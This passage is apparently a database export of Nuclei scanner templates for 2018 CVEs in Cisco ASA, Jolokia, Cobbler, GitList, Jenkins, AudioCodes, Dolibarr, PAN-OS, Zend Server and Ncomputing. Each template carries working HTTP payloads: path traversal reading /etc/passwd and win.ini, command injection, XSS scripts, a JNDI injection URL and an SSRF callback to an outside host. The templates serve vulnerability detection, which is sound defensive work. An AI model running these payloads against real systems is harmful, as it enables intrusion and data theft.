Virtual (FTDv). Cisco Bug IDs: CSCvi16029.\n impact: |\n An attacker can read sensitive files on the Cisco ASA firewall, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the necessary security patches or updates provided by Cisco to fix the local file inclusion vulnerability.\n reference:\n - https://github.com/yassineaboukir/CVE-2018-0296\n - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180606-asaftd\n - https://www.exploit-db.com/exploits/44956/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-0296\n - http://www.securitytracker.com/id/1041076\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n cvss-score: 7.5\n cve-id: CVE-2018-0296\n cwe-id: CWE-22,CWE-20\n epss-score: 0.97411\n epss-percentile: 0.99921\n cpe: cpe:2.3:a:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cisco\n product: adaptive_security_appliance_software\n tags: cve2018,cve,edb,cisco,lfi,traversal,asa,kev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions\"\n\n headers:\n Accept-Encoding: deflate\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"///sessions\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ea84d5647989707121d9843e455bcda230a00c0e7cda6d49b7de19e4413ba116022100a43113bc957e23871b7cf6e215c873464e5b1a00ca3dde56d09993a71a3849a7:922c64590222798bb761d5b6d8e72950", "hash": "95cb86aad23ea77f7dce1cbcd582979c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308015" }, "name": "CVE-2018-1000129.yaml", "content": "id: CVE-2018-1000129\n\ninfo:\n name: Jolokia 1.3.7 - Cross-Site Scripting\n author: mavericknerd,0h1in9e,daffainfo\n severity: medium\n description: |\n Jolokia 1.3.7 is vulnerable to cross-site scripting in the HTTP servlet and allows an attacker to execute malicious JavaScript in the victim's browser.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of Jolokia or apply the necessary security patches to mitigate the XSS vulnerability.\n reference:\n - https://jolokia.org/#Security_fixes_with_1.5.0\n - https://github.com/rhuss/jolokia/commit/5895d5c137c335e6b473e9dcb9baf748851bbc5f#diff-f19898247eddb55de6400489bff748ad\n - https://blog.gdssecurity.com/labs/2018/4/18/jolokia-vulnerabilities-rce-xss.html\n - https://blog.it-securityguard.com/how-i-made-more-than-30k-with-jolokia-cves/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-1000129\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-1000129\n cwe-id: CWE-79\n epss-score: 0.00257\n epss-percentile: 0.64818\n cpe: cpe:2.3:a:jolokia:jolokia:1.3.7:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: jolokia\n product: jolokia\n tags: cve2018,cve,jolokia,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/jolokia/read?mimeType=text/html\"\n - \"{{BaseURL}}/jolokia/read?mimeType=text/html\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"java.lang.IllegalArgumentException\"\n - \"No type with name\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ceae38b96d248c63737a82c437c72e4a369cf651d1c2371f95595a2622cc58d302210086e805d7edbfb0a898eacff9a76969da740278209f40b3ba6cba2e5d615cfa16:922c64590222798bb761d5b6d8e72950", "hash": "163c7b52b8038801e7b2a176bf633503", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308016" }, "name": "CVE-2018-1000130.yaml", "content": "id: CVE-2018-1000130\n\ninfo:\n name: Jolokia Agent - JNDI Code Injection\n author: milo2012\n severity: high\n description: |\n Jolokia agent is vulnerable to a JNDI injection vulnerability that allows a remote attacker to run arbitrary Java code on the server when the agent is in proxy mode.\n impact: |\n Successful exploitation of this vulnerability can lead to remote code execution, compromising the affected system.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the vulnerability.\n reference:\n - https://jolokia.org/#Security_fixes_with_1.5.0\n - https://access.redhat.com/errata/RHSA-2018:2669\n - https://nvd.nist.gov/vuln/detail/CVE-2018-1000130\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.1\n cve-id: CVE-2018-1000130\n cwe-id: CWE-74\n epss-score: 0.89191\n epss-percentile: 0.98492\n cpe: cpe:2.3:a:jolokia:webarchive_agent:1.3.7:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: jolokia\n product: webarchive_agent\n tags: cve2018,cve,jolokia,rce,jndi,proxy\n\nhttp:\n - raw:\n - |\n POST /jolokia/read/getDiagnosticOptions HTTP/1.1\n Host: {{Hostname}}\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.\n Content-Type: application/x-www-form-urlencoded\n\n {\n \"type\":\"read\",\n \"mbean\":\"java.lang:type=Memory\",\n \"target\":{\n \"url\":\"service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\"\n }\n }\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402202738b8f849e2ff4cc3b3029c5fa5990ddaa02ff6f7dd9d8bfc66cd4e143726e002205dda92656c7b74f10e3a011a74db4fb26e23385d8f5feb67eb0f5c111f526f12:922c64590222798bb761d5b6d8e72950", "hash": "ce96b13358b64b4f03443d764d43d9d7", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308017" }, "name": "CVE-2018-1000226.yaml", "content": "id: CVE-2018-1000226\n\ninfo:\n name: Cobbler - Authentication Bypass\n author: c-sh0\n severity: critical\n description: Cobbler versions 2.6.11+, but code inspection suggests at least 2.0.0+ and possibly even older versions, may be vulnerable to an authentication bypass vulnerability in XMLRPC API (/cobbler_api) that can result in privilege escalation, data manipulation or exfiltration, and LDAP credential harvesting. This attack appear to be exploitable via \"network connectivity\". Taking advantage of improper validation of security tokens in API endpoints. Please note this is a different issue than CVE-2018-10931.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Cobbler.\n reference:\n - https://github.com/cobbler/cobbler/issues/1916\n - https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-1000226\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-1000226\n cwe-id: CWE-732\n epss-score: 0.01309\n epss-percentile: 0.8563\n cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cobblerd\n product: cobbler\n tags: cve2018,cve,cobbler,auth-bypass,cobblerd\n\nhttp:\n - raw:\n - |\n POST {{BaseURL}}/cobbler_api HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/xml\n\n \n \n _CobblerXMLRPCInterface__make_token\n \n \n \n cobbler\n \n \n \n \n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - \"!contains(tolower(body), 'faultCode')\"\n\n - type: word\n part: header\n words:\n - \"Content-Type: text/xml\"\n\n - type: word\n part: body\n words:\n - \"\"\n\n - type: regex\n part: body\n regex:\n - \"(.*[a-zA-Z0-9].+==)    \"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502201a7c5859f426d96f45cd86e280a49186d9b9ea388944c9ac9aa3c03a68f61219022100faca8e8923400b4cdf7ce1d714dde9bf2ed095375ead8f2870d6385412ee7e4e:922c64590222798bb761d5b6d8e72950", "hash": "d7433822aed5bbea3abe79162620c50b", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308018" }, "name": "CVE-2018-1000533.yaml", "content": "id: CVE-2018-1000533\n\ninfo:\n name: GitList < 0.6.0 Remote Code Execution\n author: pikpikcu\n severity: critical\n description: klaussilveira GitList version <= 0.6 contains a passing incorrectly sanitized input via the `searchTree` function that can result in remote code execution.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.\n remediation: |\n Upgrade GitList to version 0.6.0 or later to mitigate this vulnerability.\n reference:\n - https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533\n - https://nvd.nist.gov/vuln/detail/CVE-2018-1000533\n - https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html\n - https://github.com/klaussilveira/gitlist/commit/87b8c26b023c3fc37f0796b14bb13710f397b322\n - https://github.com/superlink996/chunqiuyunjingbachang\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-1000533\n cwe-id: CWE-20\n epss-score: 0.97242\n epss-percentile: 0.99831\n cpe: cpe:2.3:a:gitlist:gitlist:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: gitlist\n product: gitlist\n tags: cve,cve2018,git,gitlist,vulhub,rce\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /{{path}}/tree/a/search HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n query=--open-files-in-pager=cat%20/etc/passwd\n\n matchers:\n - type: word\n part: body\n words:\n - \"root:/root:/bin/bash\"\n\n extractors:\n - type: regex\n name: path\n group: 1\n regex:\n - '(.*?)'\n internal: true\n part: body\n# digest: 4a0a0047304502205d2c71f20fa19a22bd2be637fb9f250481422ea2c7a2f6a04beeec5e09b179ff0221008da783bdf386a1fcc3b2a3eb7663a56d1e4486680f94795bd3a365ba2542a2c4:922c64590222798bb761d5b6d8e72950", "hash": "ea15ed8e0220c70062795a1beffb02cc", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308019" }, "name": "CVE-2018-1000600.yaml", "content": "id: CVE-2018-1000600\n\ninfo:\n name: Jenkins GitHub Plugin <=1.29.1 - Server-Side Request Forgery\n author: geeknik\n severity: high\n description: |\n Jenkins GitHub Plugin 1.29.1 and earlier is susceptible to server-side request forgery via GitHubTokenCredentialsCreator.java, which allows attackers to leverage attacker-specified credentials IDs obtained through another method and capture the credentials stored in Jenkins.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, potential data leakage, and further attacks on the network.\n remediation: |\n Upgrade Jenkins GitHub Plugin to version 1.29.2 or later to mitigate the vulnerability.\n reference:\n - https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915\n - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/\n - https://jenkins.io/security/advisory/2018-06-25/#SECURITY-915\n - https://nvd.nist.gov/vuln/detail/CVE-2018-1000600\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2018-1000600\n cwe-id: CWE-200\n epss-score: 0.93232\n epss-percentile: 0.99014\n cpe: cpe:2.3:a:jenkins:github:*:*:*:*:*:jenkins:*:*\n metadata:\n max-request: 1\n vendor: jenkins\n product: github\n framework: jenkins\n tags: cve,cve2018,jenkins,ssrf,oast,github\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://{{interactsh-url}}\"\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4b0a00483046022100bf2a9e11b8abb8568b2c65c93dba5541878586fe70a82089f8ff698406d5aeeb022100f63677bc4a54325d391b65c47da7048d32719df27785066d2a3297d0dcd4d2b1:922c64590222798bb761d5b6d8e72950", "hash": "14da7397cc31671d9dee04c619947640", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30801a" }, "name": "CVE-2018-1000671.yaml", "content": "id: CVE-2018-1000671\n\ninfo:\n name: Sympa version =>6.2.16 - Cross-Site Scripting\n author: 0x_Akoko\n severity: medium\n description: Sympa version 6.2.16 and later contains a URL Redirection to Untrusted Site vulnerability in the referer parameter of the wwsympa fcgi login action that can result in open redirection and reflected cross-site scripting via data URIs.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of Sympa (>=6.2.17) or apply the necessary security patches provided by the vendor.\n reference:\n - https://github.com/sympa-community/sympa/issues/268\n - https://vuldb.com/?id.123670\n - https://nvd.nist.gov/vuln/detail/CVE-2018-1000671\n - https://lists.debian.org/debian-lts-announce/2018/09/msg00023.html\n - https://lists.debian.org/debian-lts-announce/2020/11/msg00015.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-1000671\n cwe-id: CWE-601\n epss-score: 0.00598\n epss-percentile: 0.77958\n cpe: cpe:2.3:a:sympa:sympa:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: sympa\n product: sympa\n shodan-query: http.html:\"sympa\"\n tags: cve,cve2018,redirect,sympa,debian\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/sympa?referer=http://interact.sh&passwd=&previous_action=&action=login&action_login=&previous_list=&list=&email='\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4a0a0047304502204e16f5d026a87fbad38aac592766dd6e68435602edbec28fe2e6270fafc0d437022100b08c758a888bb461050d16dce5bf53016a9a5c643a58e4b347f17111f5cb0bf2:922c64590222798bb761d5b6d8e72950", "hash": "e041ba95962eb8cea8329a146a9e8389", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30801b" }, "name": "CVE-2018-1000856.yaml", "content": "id: CVE-2018-1000856\n\ninfo:\n name: DomainMOD 4.11.01 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n DomainMOD 4.11.01 is vulnerable to cross-site scripting via the segments/add.php Segment Name field.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.\n reference:\n - https://github.com/domainmod/domainmod/issues/80\n - https://nvd.nist.gov/vuln/detail/CVE-2018-1000856\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 4.8\n cve-id: CVE-2018-1000856\n cwe-id: CWE-79\n epss-score: 0.00092\n epss-percentile: 0.38207\n cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: domainmod\n product: domainmod\n tags: cve2018,cve,domainmod,xss,authenticated\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n new_username={{username}}&new_password={{password}}\n - |\n POST /segments/add.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n new_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=test.com&new_description=test&new_notes=test\n - |\n GET /segments/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n host-redirects: true\n max-redirects: 3\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205e60ba8ac7b7b68b9dcb58a31e4b4083007aa34e42c8dbc2d4750a2e0242c4ef022100b9eb8ca7486f72fde65b1b901b782329f828735d4b45ec7c80b345137845b021:922c64590222798bb761d5b6d8e72950", "hash": "3d3b1a9f33b9fe58617d1322663b6ce3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30801c" }, "name": "CVE-2018-1000861.yaml", "content": "id: CVE-2018-1000861\n\ninfo:\n name: Jenkins - Remote Command Injection\n author: dhiyaneshDK,pikpikcu\n severity: critical\n description: Jenkins 2.153 and earlier and LTS 2.138.3 and earlier are susceptible to a remote command injection via stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire Jenkins server.\n remediation: |\n Apply the latest security patches and updates provided by Jenkins to mitigate this vulnerability.\n reference:\n - https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861\n - https://nvd.nist.gov/vuln/detail/CVE-2018-1000861\n - https://jenkins.io/security/advisory/2018-12-05/#SECURITY-595\n - http://packetstormsecurity.com/files/166778/Jenkins-Remote-Code-Execution.html\n - https://access.redhat.com/errata/RHBA-2019:0024\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-1000861\n cwe-id: CWE-502\n epss-score: 0.9734\n epss-percentile: 0.99882\n cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:*\n metadata:\n max-request: 1\n vendor: jenkins\n product: jenkins\n tags: cve2018,cve,packetstorm,kev,vulhub,rce,jenkins\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"package#vulntest\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100a0e0d200c13ff780452945498a6718daad53e9ac916fec0ae1d8ec8279d22c87022026d4243303647e6e1fa58d9a299d869d55e93ab4c51fdffbfba18684c231c7f0:922c64590222798bb761d5b6d8e72950", "hash": "e0bbb5c72c960fe3aba77aad6f90b651", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30801d" }, "name": "CVE-2018-10093.yaml", "content": "id: CVE-2018-10093\n\ninfo:\n name: AudioCodes 420HD - Remote Code Execution\n author: wisnupramoedya\n severity: high\n description: |\n AudioCodes IP phone 420HD devices using firmware version 2.2.12.126 allow remote code execution.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the device, potentially leading to a complete compromise of the phone and unauthorized access to the VoIP network.\n remediation: |\n Apply the latest firmware update provided by AudioCodes to fix the vulnerability and ensure proper input validation.\n reference:\n - https://www.exploit-db.com/exploits/46164\n - https://nvd.nist.gov/vuln/detail/CVE-2018-10093\n - https://www.exploit-db.com/exploits/46164/\n - http://seclists.org/fulldisclosure/2019/Jan/38\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2018-10093\n cwe-id: CWE-862\n epss-score: 0.06287\n epss-percentile: 0.92936\n cpe: cpe:2.3:o:audiocodes:420hd_ip_phone_firmware:2.2.12.126:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: audiocodes\n product: 420hd_ip_phone_firmware\n tags: cve,cve2018,rce,iot,audiocode,edb,seclists,audiocodes\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/command.cgi?cat%20/etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"admin:.*:*sh$\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009717aaaf0b277c4052ff497e50b30916cc725ab5ee7ba798c188a4452303a46f022100f5620bfab5e60bb8ce234bb1ae2fe3a56850a5fa414dc90de85f0e9a5724834a:922c64590222798bb761d5b6d8e72950", "hash": "1fc9ab44bd07bb80ea193ec18493a6fd", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30801e" }, "name": "CVE-2018-10095.yaml", "content": "id: CVE-2018-10095\n\ninfo:\n name: Dolibarr <7.0.2 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: |\n Dolibarr before 7.0.2 is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to Dolibarr version 7.0.2 or later to mitigate this vulnerability.\n reference:\n - https://sysdream.com/news/lab/2018-05-21-cve-2018-10095-dolibarr-xss-injection-vulnerability/\n - https://github.com/Dolibarr/dolibarr/commit/1dc466e1fb687cfe647de4af891720419823ed56\n - https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog\n - https://nvd.nist.gov/vuln/detail/CVE-2018-10095\n - http://www.openwall.com/lists/oss-security/2018/05/21/3\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-10095\n cwe-id: CWE-79\n epss-score: 0.95296\n epss-percentile: 0.99203\n cpe: cpe:2.3:a:dolibarr:dolibarr:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dolibarr\n product: dolibarr\n tags: cve2018,cve,xss,dolibarr\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e638c1656a8815e12d2d2ad818bc56561808d9c56e7840b10d09443cdb5a4fcb022100acbf92f5d9af6213135181dfd35e83357559a6ab1db83c6db9d5a36579e22287:922c64590222798bb761d5b6d8e72950", "hash": "0513f4a985add0342cce29841261f234", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30801f" }, "name": "CVE-2018-10141.yaml", "content": "id: CVE-2018-10141\n\ninfo:\n name: Palo Alto Networks PAN-OS GlobalProtect <8.1.4 - Cross-Site Scripting\n author: dhiyaneshDk\n severity: medium\n description: Palo Alto Networks PAN-OS before 8.1.4 GlobalProtect Portal Login page allows an unauthenticated attacker to inject arbitrary JavaScript or HTML, making it vulnerable to cross-site scripting.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities.\n remediation: |\n Upgrade to Palo Alto Networks PAN-OS GlobalProtect VPN client version 8.1.4 or later to mitigate this vulnerability.\n reference:\n - https://security.paloaltonetworks.com/CVE-2018-10141\n - https://nvd.nist.gov/vuln/detail/CVE-2018-10141\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Elsfa7-110/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-10141\n cwe-id: CWE-79\n epss-score: 0.00126\n epss-percentile: 0.46296\n cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: paloaltonetworks\n product: pan-os\n tags: cve,cve2018,panos,vpn,globalprotect,xss,paloaltonetworks\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'var valueUser = \"j\";-alert(1)-\"x\";'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022018f9350a51b781627e508e4ea73cb51e957d0a25e20e8c48fddab20c83c420de022100e3b19a249e90117477ab0f47433355e22b384c3b92322dd9200df419034324be:922c64590222798bb761d5b6d8e72950", "hash": "eb27ce9799fe06626349e465eb8f8ac5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308020" }, "name": "CVE-2018-10201.yaml", "content": "id: CVE-2018-10201\n\ninfo:\n name: Ncomputing vSPace Pro 10 and 11 - Directory Traversal\n author: 0x_akoko\n severity: high\n description: Ncomputing vSpace Pro versions 10 and 11 suffer from a directory traversal vulnerability.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to read arbitrary files from the target system.\n remediation: |\n Apply the latest security patches or updates provided by Ncomputing to fix the directory traversal vulnerability.\n reference:\n - https://packetstormsecurity.com/files/147303/Ncomputing-vSPace-Pro-10-11-Directory-Traversal.html\n - https://nvd.nist.gov/vuln/detail/CVE-2018-10201\n - http://www.kwell.net/kwell_blog/?p=5199\n - https://www.kwell.net/kwell/index.php?option=com_newsfeeds&view=newsfeed&id=15&Itemid=173&lang=es\n - https://support.ncomputing.com/portal/kb/articles/ncomputing-health-monitor-server-vulnerability-patch\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-10201\n cwe-id: CWE-22\n epss-score: 0.04525\n epss-percentile: 0.91637\n cpe: cpe:2.3:a:ncomputing:vspace_pro:10:*:*:*:*:*:*:*\n metadata:\n max-request: 4\n vendor: ncomputing\n product: vspace_pro\n tags: cve,cve2018,ncomputing,lfi,packetstorm\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini'\n - '{{BaseURL}}/...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini'\n - '{{BaseURL}}/..../..../..../..../..../..../..../..../..../windows/win.ini'\n - '{{BaseURL}}/....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini'\n\n stop-at-first-match: true\n matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n# digest: 4b0a004830460221008cc9ffc3136acb7533e4d2b6f873e5f4814bfebe687cc77653ef5f49723851bf022100f905b97f3c07686c81b4f1fb0bf84c6ffd2379b58246323892260ede3a60fc98:922c64590222798bb761d5b6d8e72950", "hash": "44029c098922da74b6229875d21c6aca", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308021" }, "name": "CVE-2018-10230.yaml", "content": "id: CVE-2018-10230\n\ninfo:\n name: Zend Server <9.13 - Cross-Site Scripting\n author: marcos_iaf\n severity: medium\n description: |\n Zend Server before version 9.13 is vulnerable to cross-site scripting via the debug_host parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade Zend Server to version 9.13 or later to mitigate this vulnerability.\n reference:\n - https://www.synacktiv.com/ressources/zend_server_9_1_3_xss.pdf\n - https://www.zend.com/en/products/server/release-notes\n - https://nvd.nist.gov/vuln/detail/CVE-2018-10230\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-10230\n cwe-id: CWE-79\n epss-score: 0.00122\n epss-percentile: 0.46318\n cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zend\n product: zend_server\n tags: cve,cve2018,xss,zend\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"is not allowed to open debug sessions\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402201423fd900a1cd2dcf52028722c5f7a43f8b6d20d5a5b65d58f59ffed42a8f6ff02205da25d220a25b5faef2f03778f2b749c7a385c901429baf839f1815fc1681d28:922c64590222798bb761d5b6d8e72950", "hash": 